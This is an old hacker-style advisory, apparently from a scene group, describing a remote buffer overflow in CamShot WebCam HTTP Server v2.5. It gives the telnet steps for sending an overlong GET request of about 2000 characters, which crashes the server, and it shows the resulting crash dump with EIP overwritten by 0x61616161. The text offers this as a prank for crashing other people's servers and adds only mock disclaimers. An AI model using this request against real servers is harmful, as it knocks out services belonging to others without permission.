#Kill a Cam Version 1x #Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP ---------------------------------------------------------------- #Intro _ So im sure you might have seen this little trick.. but if you havent, its a rather funny way to screw with a server running CamShot WebCam HTTP Server v2.5. As always, this is for you information only, hacking is bad, it make mes cry... im starting to cry thinking about it now.. see what you've done??! #Affects _ As far as I know, for sure it affects Win9x, I am yet to find an NT, ME, or 2000 box running it. #The Code [lucid@localhost]$ telnet www.test.com 80 Trying test.com... Connected to www.test.com Escape character is '^]'. GET (buffer) HTTP/1.1 (enter) (enter) #Why _ (buffer) is about 2000 charicters, requesting this cuases the server to over flow itself, and in time, crashing the software, ( once or twice on my test machine it killed the system as well ). #What They See CAMSHOT caused an invalid page fault in module at 0000:61616161. Registers: EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246 EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058 ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000 Bytes at CS:EIP: Stack dump: bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74 005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8 #Closing _ Yes its a lame little exploit bu its fnny none the less. Again only use this on yourself would wanna make me cry again. Lucid Phreak2000.com